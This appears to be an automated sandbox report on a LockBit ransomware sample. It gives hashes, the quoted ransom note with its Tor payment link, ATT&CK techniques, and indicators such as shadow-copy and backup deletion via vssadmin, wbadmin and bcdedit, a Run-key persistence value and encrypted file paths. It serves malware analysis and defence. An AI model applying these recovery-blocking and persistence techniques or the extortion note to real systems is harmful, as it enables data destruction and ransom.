lockbit | b7147a76c6695b750a84de55d4569f71f694b33aeefeef5daa09318ebabd9a24

Resubmissions

20-03-2024 09:55

240320-lxzn8sdh94 10

20-03-2024 09:53

240320-lwzb3sef3x 10

18-03-2024 09:01

240318-ky38dadf6s 10

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
18-03-2024 09:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
Size

150KB
MD5

1f4f6abfced4c347ba951a04c8d86982
SHA1

a4c486b0926f55e99d12f749135612602cc4bf64
SHA256

1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18
SHA512

ae9d631a193d04194bcb54ccf5573730c04b2d9d732addf04af2100e7d67584a3cfba67cfaa2a9da05099d71c56dd58cfdb9f58d070b72ae58d0add20cf0afd3
SSDEEP

3072:pm3/OyVPX/1jTCAR4fsp0Vb2xosM89QJ49cqO2DDHMqqD/Tx0Hv/:pq/1VP1OyysNmJyXsqqD/ls/

Score

10^/10

lockbit evasion persistence ransomware

Malware Config

Extracted

Path

C:\Program Files\DVD Maker\de-DE\Restore-My-Files.txt

Family

lockbit

Ransom Note

All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?F51E3D94FA5D7445B557A4CE9FA5AB97 This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/about !!! We also download huge amount of your private data, including finance information, clients personal info, network diagrams, passwords and so on. Don't forget about GDPR.

URLs

http://lockbitks2tvnmwk.onion/?F51E3D94FA5D7445B557A4CE9FA5AB97

Signatures

Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1260	bcdedit.exe
2172	bcdedit.exe

Renames multiple (9311) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
3068	wbadmin.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe\""	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6B03.tmp.bmp"	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART2.BDR	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.JS	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Tunis	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_hov.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00171_.GIF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00132_.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_LightSpirit.gif	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.HXS	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZDAT12.ACCDU	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RESUME.DPV	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00330_.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR10F.GIF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\service.js	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\settings.js	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\picturePuzzle.css	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)greenStateIcon.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jre7\lib\logging.properties	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02431_.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1036\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_down.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00779_.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Windows Media Player\fr-FR\WMPDMC.exe.mui	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14581_.GIF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-nodes.xml	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Slipstream.eftx	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\VBAOWS10.CHM	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Indian\Chagos	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0102002.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR50F.GIF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00396_.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_LightSpirit.gif	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\flyout.css	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files\Microsoft Games\Chess\fr-FR\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0183174.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18187_.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.HK.XML	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsImageTemplate.html	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\Restore-My-Files.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\7-Zip\Lang\io.txt	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\ja-JP\Hearts.exe.mui	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152622.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18208_.WMF	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\fr-FR\WMPDMCCore.dll.mui	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\ja-JP\wmpnssui.dll.mui	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3864	2968	WerFault.exe	27

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2568	vssadmin.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\Desktop\WallpaperStyle = "2"	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Control Panel\Desktop\TileWallpaper = "0"	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3896	PING.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
Token: SeDebugPrivilege	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
Token: SeBackupPrivilege	2660	vssvc.exe
Token: SeRestorePrivilege	2660	vssvc.exe
Token: SeAuditPrivilege	2660	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2332	WMIC.exe
Token: SeSecurityPrivilege	2332	WMIC.exe
Token: SeTakeOwnershipPrivilege	2332	WMIC.exe
Token: SeLoadDriverPrivilege	2332	WMIC.exe
Token: SeSystemProfilePrivilege	2332	WMIC.exe
Token: SeSystemtimePrivilege	2332	WMIC.exe
Token: SeProfSingleProcessPrivilege	2332	WMIC.exe
Token: SeIncBasePriorityPrivilege	2332	WMIC.exe
Token: SeCreatePagefilePrivilege	2332	WMIC.exe
Token: SeBackupPrivilege	2332	WMIC.exe
Token: SeRestorePrivilege	2332	WMIC.exe
Token: SeShutdownPrivilege	2332	WMIC.exe
Token: SeDebugPrivilege	2332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2332	WMIC.exe
Token: SeRemoteShutdownPrivilege	2332	WMIC.exe
Token: SeUndockPrivilege	2332	WMIC.exe
Token: SeManageVolumePrivilege	2332	WMIC.exe
Token: 33	2332	WMIC.exe
Token: 34	2332	WMIC.exe
Token: 35	2332	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2332	WMIC.exe
Token: SeSecurityPrivilege	2332	WMIC.exe
Token: SeTakeOwnershipPrivilege	2332	WMIC.exe
Token: SeLoadDriverPrivilege	2332	WMIC.exe
Token: SeSystemProfilePrivilege	2332	WMIC.exe
Token: SeSystemtimePrivilege	2332	WMIC.exe
Token: SeProfSingleProcessPrivilege	2332	WMIC.exe
Token: SeIncBasePriorityPrivilege	2332	WMIC.exe
Token: SeCreatePagefilePrivilege	2332	WMIC.exe
Token: SeBackupPrivilege	2332	WMIC.exe
Token: SeRestorePrivilege	2332	WMIC.exe
Token: SeShutdownPrivilege	2332	WMIC.exe
Token: SeDebugPrivilege	2332	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2332	WMIC.exe
Token: SeRemoteShutdownPrivilege	2332	WMIC.exe
Token: SeUndockPrivilege	2332	WMIC.exe
Token: SeManageVolumePrivilege	2332	WMIC.exe
Token: 33	2332	WMIC.exe
Token: 34	2332	WMIC.exe
Token: 35	2332	WMIC.exe
Token: SeBackupPrivilege	1496	wbengine.exe
Token: SeRestorePrivilege	1496	wbengine.exe
Token: SeSecurityPrivilege	1496	wbengine.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2968 wrote to memory of 3060	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	29
PID 2968 wrote to memory of 3060	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	29
PID 2968 wrote to memory of 3060	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	29
PID 2968 wrote to memory of 3060	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	29
PID 3060 wrote to memory of 2568	3060	cmd.exe	31
PID 3060 wrote to memory of 2568	3060	cmd.exe	31
PID 3060 wrote to memory of 2568	3060	cmd.exe	31
PID 3060 wrote to memory of 2332	3060	cmd.exe	34
PID 3060 wrote to memory of 2332	3060	cmd.exe	34
PID 3060 wrote to memory of 2332	3060	cmd.exe	34
PID 3060 wrote to memory of 1260	3060	cmd.exe	36
PID 3060 wrote to memory of 1260	3060	cmd.exe	36
PID 3060 wrote to memory of 1260	3060	cmd.exe	36
PID 3060 wrote to memory of 2172	3060	cmd.exe	37
PID 3060 wrote to memory of 2172	3060	cmd.exe	37
PID 3060 wrote to memory of 2172	3060	cmd.exe	37
PID 3060 wrote to memory of 3068	3060	cmd.exe	38
PID 3060 wrote to memory of 3068	3060	cmd.exe	38
PID 3060 wrote to memory of 3068	3060	cmd.exe	38
PID 2968 wrote to memory of 3840	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	44
PID 2968 wrote to memory of 3840	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	44
PID 2968 wrote to memory of 3840	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	44
PID 2968 wrote to memory of 3840	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	44
PID 2968 wrote to memory of 3864	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	45
PID 2968 wrote to memory of 3864	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	45
PID 2968 wrote to memory of 3864	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	45
PID 2968 wrote to memory of 3864	2968	1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe	45
PID 3840 wrote to memory of 3896	3840	cmd.exe	47
PID 3840 wrote to memory of 3896	3840	cmd.exe	47
PID 3840 wrote to memory of 3896	3840	cmd.exe	47
PID 3840 wrote to memory of 3896	3840	cmd.exe	47
PID 3840 wrote to memory of 3952	3840	cmd.exe	48
PID 3840 wrote to memory of 3952	3840	cmd.exe	48
PID 3840 wrote to memory of 3952	3840	cmd.exe	48
PID 3840 wrote to memory of 3952	3840	cmd.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
"C:\Users\Admin\AppData\Local\Temp\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe"
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2968
- C:\Windows\System32\cmd.exe
